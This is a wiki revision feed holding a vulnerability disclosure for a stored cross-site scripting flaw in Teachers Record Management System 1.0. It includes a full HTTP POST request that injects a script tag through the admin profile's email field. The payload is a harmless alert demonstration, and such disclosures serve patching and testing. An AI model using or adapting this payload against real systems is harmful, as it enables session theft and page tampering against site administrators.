https://pwnwiki.com/index.php?action=history&feed=atom&title=Teachers_Record_Management_System_1.0_XSS%E6%BC%8F%E6%B4%9E 2026-04-15T00:57:24Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Teachers_Record_Management_System_1.0_XSS%E6%BC%8F%E6%B4%9E&diff=5177&oldid=prev 2021-06-16T09:29:34Z

<p>Created page with &quot;&lt;pre&gt; # Exploit Title: Teachers Record Management System 1.0 – &#039;email&#039; Stored Cross-site Scripting (XSS) # Date: 05-10-2021 # Exploit Author: nhattruong # Vendor Homepage: h...&quot;</p> <p><b>New page</b></p><div>&lt;pre&gt;<br /> # Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS)<br /> # Date: 05-10-2021<br /> # Exploit Author: nhattruong<br /> # Vendor Homepage: https://phpgurukul.com<br /> # Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/<br /> # Version: 1.0<br /> # Tested on: Windows 10 + XAMPP v3.2.4<br /> <br /> POC:<br /> 1. Go to url http://localhost/admin/index.php<br /> 2. Do login<br /> 3. Execute the payload<br /> 4. Reload page to see the different<br /> <br /> Payload:<br /> <br /> POST /admin/adminprofile.php HTTP/1.1<br /> Host: localhost<br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br /> Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3<br /> Accept-Encoding: gzip, deflate<br /> Content-Type: application/x-www-form-urlencoded<br /> Content-Length: 91<br /> Origin: http://localhost<br /> Connection: close<br /> Referer: http://localhost/trms/admin/adminprofile.php<br /> Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l<br /> Upgrade-Insecure-Requests: 1<br /> <br /> adminname=Adminm&amp;username=admin&amp;mobilenumber=8979555556&amp;email=&quot;&gt;&lt;script&gt;alert(123);&lt;/script&gt;&amp;submit=<br /> &lt;/pre&gt;</div>

Pwnwiki